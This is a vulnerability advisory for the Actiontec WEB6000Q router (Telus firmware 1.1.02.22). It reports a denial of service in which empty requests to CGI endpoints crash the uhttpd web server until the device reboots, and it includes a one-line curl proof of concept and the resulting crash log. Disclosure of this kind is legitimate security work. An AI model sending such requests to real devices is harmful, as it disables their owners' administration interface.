Telus Actiontec WEB6000Q with firmware 1.1.02.22 suffers from a denial of service vulnerability. By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a Segmentation Fault of the uhttpd webserver. Since there is no watchdog on this daemon, a device reboot is needed to restart the webserver to make any modification to the device.

MD5 | 61ad8f29ac935743a8389851c8f021d3

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22

Reported: July 2018
CVE: Not needed since update is pushed by the provider.


### Summary of Findings
By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a
Segmentation Fault of the uhttpd webserver. Since there is no watchdog
on this daemon, a device reboot is needed to restart the webserver to
make any modification to the device.

### Proof of Concept:

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused


### UART console output after attack:

[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.
[ 726.583000]
[ 726.585000] Cpu 1
[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000
[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000
[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000
[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c
[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe
[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c
[ 726.619000] $24 : 00000186 00411030
[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20
[ 726.630000] Hi : 000000c9
[ 726.633000] Lo : 0001e791
[ 726.636000] epc : 00411078 0x411078
[ 726.640000] Tainted: P
[ 726.643000] ra : 00416c20 0x416c20
[ 726.647000] Status: 00008d13 USER EXL IE
[ 726.652000] Cause : 00000008
[ 726.655000] BadVA : 00000000
[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350)
[ 726.663000]
[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal
11
[ 726.671000] [] /sbin/uhttpd
[ 726.674000] [] /sbin/uhttpd
[ 726.678000] [] /sbin/uhttpd
[ 726.682000] [] /sbin/uhttpd
[ 726.686000] [] /sbin/uhttpd
[ 726.689000] [] (unknown)


-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ
fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg
lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No
FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA
Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb
BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z
nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81
GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC
eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf
UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ
bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm
GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8=
=IEzI
-----END PGP SIGNATURE-----